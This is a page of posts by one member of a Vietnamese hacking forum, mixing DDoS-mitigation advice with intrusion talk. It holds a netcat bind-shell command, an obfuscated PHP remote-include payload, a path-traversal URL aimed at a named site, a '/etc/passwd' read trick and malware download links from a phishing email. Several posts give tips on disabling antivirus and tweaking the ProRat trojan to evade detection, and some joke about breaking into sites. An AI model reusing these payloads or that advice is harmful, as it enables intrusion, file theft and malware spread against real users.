banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: ~simon~  XML
Profile for ~simon~ Messages posted by ~simon~ [ number of posts not being displayed on this page: 3 ]
 
-Xin lỗi chứ em không gọi là bạn được ,từ này em gọi bọn stl là bọn địch chắc đang ức chế lắm khi HVA vẫn trơ như tượng đá.
-Cũng có lẽ cấp trên chỉ thị mấy chú không hạ được HVA thì tháng này cắt luơng cũng nên smilie)
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
Em đọc đến đây cũng biết được phần nào công sức của mọi người trong vụ này,hiểu được một phần câu chuyện ,nhưng thắc mắc mãi chữ STL nghĩa là gì nghĩ hoài không ra ?
Bị con kavo rồi,nếu ko tự diệt được thì đem ra tiệm cho người ta kiếm tiền smilie

conmale wrote:

HAIYEN02 wrote:
....
Em cảm ơn anh, cái vấn đề này em có nghĩ đến, nhưng mà chỉ là tạm thời thôi, nếu lần sau nó up X-Flash len site khác thì mình lại phải vào httpd sửa lại hoặc thêm vào.
Nếu dùng iptables thì có tốt hơn ko anh nhỉ? 


Nếu bồ làm chủ server và có quyền đụng đến iptables thì quá tốt.

Bồ cần 2 thứ quan trọng:

1) connection limit:

iptables -A INPUT -p tcp -d $IP --dport 80 -m state --state ESTABLISHED -m connlimit --connlimit-above $CONN -j DROP

trong đó,

$IP là IP của bồ.
$CONN là số lượng connections đi từ 1 IP mà bồ cho phép tạo ra. Thường mỗi IP không dùng quá 4 connections nếu đã chỉnh KeepAlive trên apache.


2) string match:

iptables -A INPUT -p tcp --tcp-flags ACK,PSH ACK,PSH -d $IP --dport 80 -m string --string "whatever" --from 10 --to 700 --algo bm -j DROP

trong đó,

$IP là IP của bồ.
"whatever" là cái string cụ thể nào đó mà x-flash đang DDoS bồ.
--from 10 --to 700 là chuỗi byte trong packet được kiểm tra xem có string nào như thế không.
--tcp-flags ACK,PSH ACK,PSH là gói TCP đặc trưng mà flash thường được dùng để tấn công.


Bồ phải xem thử kernel của Linux server bồ đang dùng đã có connlimit và string modules chưa. Nếu chưa thì phải patch và build lại kernel. Patch và build thế nào thì tham khảo các thảo luận trong box "*nix". Ngoài ra bồ phải phân tích kỹ các gói tin mình bị tấn công gồm có cái gì để điều chỉnh cho thích hợp. mod_security cho apache cũng là một tầng bảo vệ tốt. Tìm đọc "Ký sự những cuộc DDoS HVA" mà ngâm cứu thêm.

Good luck. 


Không biết nói gì thank lão conmale smilie

leo9x wrote:
nếu như các pro nói thì em cho netcat vào ổ C của máy đó , roi run nó như kiểu
nc -vv -l -p 8080 -e cmd.exe rồi sau đó mình cho netcat lắng nghe ở máy mình
làm như thế có được không nhỉ smilie , nếu được thì add user và nâng quyền lên làm admin có được không nhỉ , nếu được thì chắc dùng remote desktop connection để connection chắc cũng được , em mới vào chỉ có vài ý đó không biết có đúng không , ai giảng giải giúp em  

Lắng nghe ai thế ? :?smilie

boybuonvn wrote:
Code:
Hacker Viet Nam <rereply@hvaonline.net>
hiển thị chi tiết
23:41
Thong bao ve chuong trinh hacker da su dung de hack website:
- Chuong trinh hacker da su dung de hack website: (Ban co the download ve nghien cuu de xem muc do nguy hiem cua chuong trinh nay,)
Canh bao ban khong nen lam dung no de hack website khac
Chuongtrinhhackweb.exe
 http://lpnumetal.com/product/chuongtrinhhackweb.exe
Chuongtrinhhackweb.zip
 http://lpnumetal.com/product/chuongtrinhhackweb.zip
Download chuong trinh, sau do open chay chuong trinh len, ban se thay 1 khung, sau do dien dia chi website bạn muon hack,
Chuong trinh chi hoat dong tren windows, linux. Neu ban gap thac mac hay lien he chung toi de duoc giai 0064ap


tối hôm qua em vào mail thì nhận đc 1 thông tin do host hvaonline.net gửi tới...em nhìn cái mail chắc chắn là do hvaonline.net gửi...khi down soft về run thì tự động biến mất ( nghi là virut rồi nên bật trình duyệt virut cũng kô quet đc....)...nó tự đông biến mất sau 3' vào window system cũng kô tìm ra ..phải chăng em bị lừa..các anh giải thích cho em vụ này...
đây là link cái url đó : http://lpnumetal.com/product/chuongtrinhhackweb.zip 

smilie Vậy mà cũng click vào chạy được thiệt bó tay cậu boybuon này luôn smilie
Btw,ai nghĩ ra kèo này chắc "thu hoạch" khá lắm đây :wink:

thienmang wrote:
IP Add = địa chỉ nhà
Nhà thì lúc nào cũng khóa cửa => xâm nhập <=> phải mở được khóa
1. Hợp lệ : Có chìa khóa do chủ nhà cấp <=> Username & Pass
2. Bất hợp lệ : Cạy cửa <=> bẻ khóa
a. Xác định rõ kiến trúc nhà xem có bao nhiêu cửa, gỗ hay bêtông, có lỗ thủng nào không, cửa sổ có khóa không để chui vào <=> Xác định HĐH hệ thống = quét Banner, tìm các lỗ hổng bảo mật trên mạng xem đã fix chưa (theo từng hệ thống khác nhau)
Nếu Admin làm biếng chưa fix => May mắn, cứ thế mà chui lỗ chó vào.
Nếu đã fix các lỗi => chỉ còn cách bẻ ổ khóa mà vào
b. Xáx định rõ loại ổ khóa cần bẻ:
Bảo mật kém : Nó xài khóa TQ, cứ lựa đại chìa có sẵn mà kiểm thử <=> Admin lơ là xài pass dễ đoán wa'. (sử dụng Tool quét pass theo Dictionary)
Bảo mật tốt : Sử dụng khóa tốt, nhiều lớp cửa, có bầy chó Becgiê canh chừng, hệ thống hồng ngoại.... hic <=> Admin đã điều chỉnh các thông số default, pass khó đoán và được mã hóa tốt, sử dụng firewall nhiều tầng, hệ thống phát hiện xâm nhập IDS.... => |o| he he
Nếu kỹ năng + kỹ thuật tốt mà chui vào được => Muốn đập phá cứ đập phá (del data, deface), muốn chôm đồ cứ chôm đồ(copy data), muốn làm nơi ăn nhậu cứ ăn nhậu (bruteforce)..... (C15 tóm cổ).
Nếu không muốn bị tóm thì đừng phá phách.
Người thông minh: Lặng im quan sát, khi rời khỏi lau sạch dấu vết (xóa dấu chân, dấu vân tay) <=> xóa tất cả log có liên quan trong hệ thống. Đục 1 lỗ phía sau tường để sau này muốn vô ngủ không cần phải chìa khóa (cài Backdoor Trojan mở port để có thể Telnet) hoặc tạo cho mình một chìa khóa hợp lệ (add Account của mình vào hệ thống).
Kẻ lóc chóc: quậy phá tùm lum, để dấu vết tá lả cho C15 túm cổ.
Kỹ năng cần có:
1. Hiểu biết cặn kẽ về hệ thống và các dịch vụ trên hệ thống (tối thiểu Win và Linux)
2. Hiểu rõ về TCP/IP cũng như các Protocol khác
3. Có kỹ năng lập trình
...........

Vài lời nhắn gởi!!!!!! 

Cool cool :lolsmilie :lolsmilie :lolsmilie
Tuyệt vời ,cảm ơn anh Zeno nhiều .
Tks bro nhiều sách thiệt ,mà bồ có cuốn Google Hack không up lên mình down với đang cần,tks
Tuyệt cú mèo,cảm ơn anh nhiều,rất bổ ích .Em sẽ cố down càng nhiều càng tốt xong up lên lại cho anh em nào chưa down được .
Chả có rì là cao siêu ,vào trang web có đính keylog(ex: bug MDAC) thế là xong smilie
tham gia cái nhẩy smilie)
http://www.xprofiles.net/bug/bug.php?file=../simon/hehe1.jpg
site gì mà shell khủng :lolsmilie :lolsmilie

sup3rmm wrote:
Vẫn còn khả năng đọc file nên việc tiếp tục nâng quyền qua local là có thể.Trường hợp dedicated server thì hiếm ai áp dụng việc bảo mật tối đa như vậy còn trường hợp share hosting thì làm vậy thật hết sức bất tiện  

code người ta thế này đọc file làm sao?
Code:
include(“/home/$file”);
smilie

gamma95 wrote:
Xét VD:
một forum bị lỗi PHP include local file (bạn cần phân biệt lỗi php include remote file và php include local file). Mỗi user sau khi đăng nhập đc upload file ảnh (VD :JPG) làm avatar, các file định dạng khác (php, asp, pl,cgi ...) đều bị cấm ko đc upload
Các file ảnh sau khi đc upload sẽ nằm trong folder www.site.com/image/xxx.JPG
link bị include local file:
http://site.com/bug.php?file=xxx.xxx
nội dung của file bug.php
<?php
include(“/home/$file”);
?> 

Câu hỏi đc đặt ra ... Làm sao include đc backdoor đây ?? smilie
Mời các bác tham gia thảo luận
(nguồn milw0rm.com) 

ha há cái này include được đã test thành công smilie


disable_functions = exec, system, passthru, proc_open, shell_exec, dl, popen, pclose, fsockopen, pfsockopen, getrusage , alter_ini, set_ini, ini_restore , set_time_limit, leak, listen, virtual , mysql_list_dbs, mysql_pconnect, mysql_create_db, mysql_drop_db, mysql_get_client_info, mysql_get_host_info, mysql_get_proto_info, mysql_db_name , phpcredits, php_logo_guid, zend_logo_guid, php_uname , getmyuid, getmygid, getmypid, getmyinode, get_current_user , syslog, openlog, fopenstream , chroot, chown, chgrp , disk_free_space, disk_total_space, diskfreespace , filegroup, fileinode, fileowner , link, readlink, symlink  

Một chữ : CHOÁNG :cry:

mabubeo90 wrote:
Bác có thể đưa lên đây đc kô? Đảm bảo trong vòng 1 ngày chơi đc tất cả các site của bác ok 

Có mới nói nha bạn mình cài VBB để thư mục install luôn đó nhưng đố ai làm được gì smilie

khuyenn wrote:
forum của mình thông thường số member truy cập là 20-30 member

nhưng ko biết sao bỗng nhiên số member tăng vọt lên 200 -300 -900-1500....

 

Bạn có bật image verify khi reg nick không ?


lưu ý : dạo này forum thường có bài poss có dạng như vầy , ko biết có phải là do nó không


Code:
123eval(includeCHR(104).CHR(116).CHR(116).CHR(112).CHR(58).CHR(47).CHR(47).CHR(102).CHR(114).CHR(101).CHR(101).CHR(119).CHR(101).CHR(98).CHR(116).CHR(111).CHR(119).CHR(110).CHR(46).CHR(99).CHR(111).CHR(47).CHR(109).CHR(98).CHR(97).CHR(98).CHR(121).CHR(107).CHR(105).CHR(115).CHR(115).CHR(56).CHR(57).CHR(49).CHR(47).CHR(114).CHR(53).CHR(55).CHR(46).CHR(116).CHR(120).(116))); //

 

Cái này bạn update lên bản IBP mới đi không thì bài như thế này còn hoài àh smilie ,bug search của IBP đấy .Mà sao ai ăn xong không xóa dấu vết đi nhỉ :wink:

cungduong wrote:
Config ok hết rồi chỉ vướng ở phía ngoài thôi, cục bộ thì kết nối Ok nhung bên ngoài kết nối vào thì chưa được. (chắc config modem chưa đúng).
Thanks shockdown! 

Bác có reg cái DYNDNS chưa ? Bác có thể mô tả lúc bác connect nó báo gì không?

conmale wrote:
Không thể format ổ cứng đang chạy hệ điều hành ngay cả đang làm trực tiếp trên máy. Bởi thế, càng không thể làm chuyện này từ xa. 

Không thể khi máy đang chạy nhưng có thể khi máy khởi động lại (đối với phân vùng đang chạy hệ điều hành) ,còn những phân vùng khác không có các locked file như bác nói thì công việc dễ dàng hơn nhiều.
Hi hi anh Defender đây rồi, em nói chơi thôi, vậy mà anh làm thiệt đi Format cái ổ Data của em.
Nghỉ chơi với anh luôn.
Khi nào rảnh vô YM chỉ em anh đã làm như thế nào nhé.  

Do có hơi dựa vào phần này nên trả lời có một vài điều không chính xác,vì chỉ chú trọng đến ổ data để giải thích cho bạn Lan Ngọc hiểu nên không chú ý đến locked file,bác commale nói ra các locked file làm cháu mới giật mình ,xin cảm ơn bác .

LanNgoc wrote:

Trojan điều khiển từ xa thì em có biết chút. Nhưng em nghĩ là phải là ngồi trước máy của mình thì mình mới vô DOS thực hiện lệnh Format ổ cứng được chứ anh.

Sao cứ rối tung lên thế nhỉ? 

Không cần thế đâu bạn smilie chỉ cần có trojan trên máy victim là mọi việc gần như đều có thể làm được, mình làm rồi mới nói nhưng chưa bao giờ format máy của ai cả.
Nếu bạn có thắc mắc về trojan nữa thì tạm lên google search với chữ Prorat down về làm thử(nhưng nói trước là nó nằm trong black list của các trình anti-virus nên muốn thử nghiệm thì tắt các trình anti đi) còn rất nhiều trojan không nằm trong black list hoặc bạn biết code chút đỉnh thì có thể sửa lại và nó có thể bypass các trình anti 1 cách dễ dàng .Lúc đó bạn sẽ tạm hiểu tại sao attacker có thể format máy bạn .

LanNgoc wrote:
Em chào các anh. Em có một câu hỏi thế này, mong được các anh giải thích cụ thể cho em hiểu.

Làm sao để có thể Format ổ cứng của một máy tính từ một máy tính khác ở xa?

Em cảm ơn. 

Khả năng lớn nhất mà mình biết đó là máy bạn bị dính trojan(chương trình có khả năng control máy của bạn từ xa thông qua internet) do attacker cài vào máy bạn theo nhiều cách trong đó khả năng dụ bạn chạy một chương trình nào đó có inject trojan hoặc đơn giản hơn chỉ cần dụ bạn click vào link một trang web mà attacker cài mã độc (ex: MDAC- link tham khảo http://milw0rm.com/exploits/2164 ) bạn cần nhớ rằng bạn chỉ cần click vào link của 1 site thôi nếu window bạn chưa update các bản vá thì máy bạn ngay lập tức đã có sẵn 1 "em" trojan trên máy rồi smilie .
Và việc format hay làm gì trên máy của bạn sẽ chả khó khăn gì khi attacker đã hoàn thành xong bước install trojan lên máy của bạn .
Không biết trả lời thế đã đủ cho bạn chưa smilie,thân.
P/s:Tất nhiên có nhiều cách nữa nếu ai biết chia sẻ luôn với mọi người.

hackernohat wrote:
He he tui có một cách giản đơn hơn cả luke

readfile("/etc/passwd");

Chấp cả Safe_mode vì đây là một hàm khá thông dụng trong việc đọc file nên ít server dám chặn nó
smilie  

vậy là pác chưa thấy quan tài rồi smilie nhiều srv dùng readfile thì cũng pó thôi

khuyenn wrote:

và mình đã quản lý forum lại được rồi,
vấn đề bây giờ là làm sao khắc phục được lỗi và bảo mật lại forum thôi
không biết sao member có thể lấy được quyền admin nữa
 

ặc thì mình nói bạn nâng cấp lên ibp mới mà chứ không thì có người vào hoài đó demosmiliemình ko làm gì cả),đóng forum lại rồi nâng cấp đi bạn smilie

khuyenn wrote:
FORUM CỦA MÌNH VỪA BỊ HACKER TẤN CÔNG VÀ ĐÃ LẤY ĐƯỢC QUYỀN ADMIN , SAU ĐÓ MÌNH ĐÃ VÀO HOST SEVER TẠO LẠI ADMIN MỚI VÀ ĐÃ XÓA CÁC NICK ADMIN KHÁC CỦA KẺ TẤN CÔNG

NAY MÌNH KHÔNG BIẾT LÀM SAO ĐỂ SỬA LỖI CHO FORUM VÀ CŨNG NHƯ BẢO MẬT LẠI FORUM

MẤY HUYNH GIÚP GIÙM VỚI

forum của mình là ipb v2.1

 

chào bạn,Forum của bạn nâng cấp lên ibp mới đi .

babygirl_studyhack wrote:
smilie máy em luon bi reset ,khi cài win luôn xuất hiện các ký tự lạ
em đã thay ram khác vào thì không bị hiện tượng như thế nữa.em đã thử 1 số công cụ test ram và theo chuẩn đoán thí có virut trong ram
ai có phần mềm diệt virut trong ram chỉ em với hoặc có cách nao cho may em ko bi reset nữa xin chỉ em với.em xin cảm ơn(SD Ram)
email:babygirl_studyhack@yahoo.com

Dời vào box "Thảo luận virus" 

smilie chắc ram của bạn bị "bad" một vài chỗ chứ làm gì có virus trong ram smilie

khuyenn wrote:
hện tại forum của mình bị tấn công khi phát hiện ra thì mình đã mất quyền admin, sau đó mình vào host sever tạo lại tài khoản admin mới và đã xóa các nick admin khác của hacker

nhưng khi đăng nhập vào admin của forum được khoản 10 phút để sửa lại forum thì nó đã bị báo lỗi này
http://i18.tinypic.com/4d4tr0m.jpg

mấy huynh xem giùm bị lỗi gì và cách sửa chữa
 


hình như mình có ghé thăm trang này thì phải smilie smilie ,nhưng không có làm cái rì hình như b@bydog gì đó change index của bạn .
Còn mình muốn trở thành bác sĩ,mong mọi người giúp đỡ smilie
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|